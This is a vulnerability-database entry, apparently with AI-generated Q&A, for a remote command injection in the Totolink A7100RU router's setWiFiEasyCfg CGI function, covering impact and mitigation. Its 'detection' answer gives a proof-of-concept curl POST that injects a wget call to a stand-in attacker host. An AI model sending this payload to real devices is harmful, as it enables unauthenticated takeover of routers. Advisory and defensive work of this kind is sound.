CVE-2026-5854
Received Received - Intake
OS Command Injection in Totolink A7100RU CGI Handler (Remote

Publication date: 2026-04-09

Last updated on: 2026-04-09

Assigner: VulDB

Description
A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. Affected by this issue is the function setWiFiEasyCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument merge results in os command injection. It is possible to initiate the attack remotely. The exploit is now public and may be used.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-04-09
Last Modified
2026-04-09
Generated
2026-05-07
AI Q&A
2026-04-09
EPSS Evaluated
2026-05-05
NVD
EUVD
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
totolink a7100ru 7.4cu.2313_b20191024
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-77 The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-5854 is a command injection vulnerability found in the TOTOLINK A7100RU router, version 7.4cu.2313_b20191024. The flaw exists in the CGI Handler component, specifically in the function setWiFiEasyCfg within the /cgi-bin/cstecgi.cgi file.

The vulnerability arises because the function processes a user-supplied parameter named "merge" without proper sanitization. This parameter's value is incorporated into a buffer and then executed as an operating system command via execv().

An attacker can exploit this remotely by sending a specially crafted HTTP POST request to the router, causing it to execute arbitrary commands on the device.


How can this vulnerability impact me? :

This vulnerability allows remote attackers to execute arbitrary operating system commands on the affected router without any authentication.

  • Complete compromise of the router device, including control over its configuration and network traffic.
  • Potential interception, modification, or redirection of network traffic passing through the router.
  • Use of the compromised router as a foothold to launch further attacks within the connected network.
  • Deployment of malicious payloads or malware on the device.

How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by sending specially crafted HTTP POST requests to the /cgi-bin/cstecgi.cgi endpoint of the Totolink A7100RU router, targeting the setWiFiEasyCfg function with the 'merge' parameter containing a command to be executed.

A proof of concept involves sending a POST request with the 'merge' parameter set to a command such as `wget 192.168.6.1:6666/testpoc`. If the device executes this command, it confirms the presence of the vulnerability.

To detect this on your network or system, you can use tools like curl or wget to send the crafted POST request and observe if the command is executed.

  • Example curl command to test the vulnerability: curl -X POST http://<router-ip>/cgi-bin/cstecgi.cgi -d 'merge=wget http://<attacker-ip>/testpoc'

How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:

The vulnerability allows remote attackers to execute arbitrary operating system commands on the affected TOTOLINK A7100RU router. This can lead to unauthorized access, data breaches, and potential compromise of sensitive information.

Such unauthorized access and potential data compromise can negatively impact compliance with common standards and regulations like GDPR and HIPAA, which require protection of personal and sensitive data against unauthorized access and breaches.

Therefore, exploitation of this vulnerability could result in violations of these regulations due to failure to adequately secure the device and protect data confidentiality and integrity.


What immediate steps should I take to mitigate this vulnerability?

To mitigate the CVE-2026-5854 vulnerability in the TOTOLINK A7100RU router, immediate steps should focus on preventing remote exploitation of the command injection flaw in the /cgi-bin/cstecgi.cgi component.

  • Restrict or block remote access to the router's CGI interface, especially the /cgi-bin/cstecgi.cgi endpoint, to prevent attackers from sending malicious POST requests.
  • Disable any unnecessary remote management features on the router to reduce the attack surface.
  • Monitor network traffic for suspicious POST requests targeting the vulnerable function or unusual command execution attempts.
  • If possible, apply any available firmware updates or patches from the vendor that address this vulnerability.
  • As a temporary measure, consider isolating the affected device from untrusted networks until a fix is applied.

Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart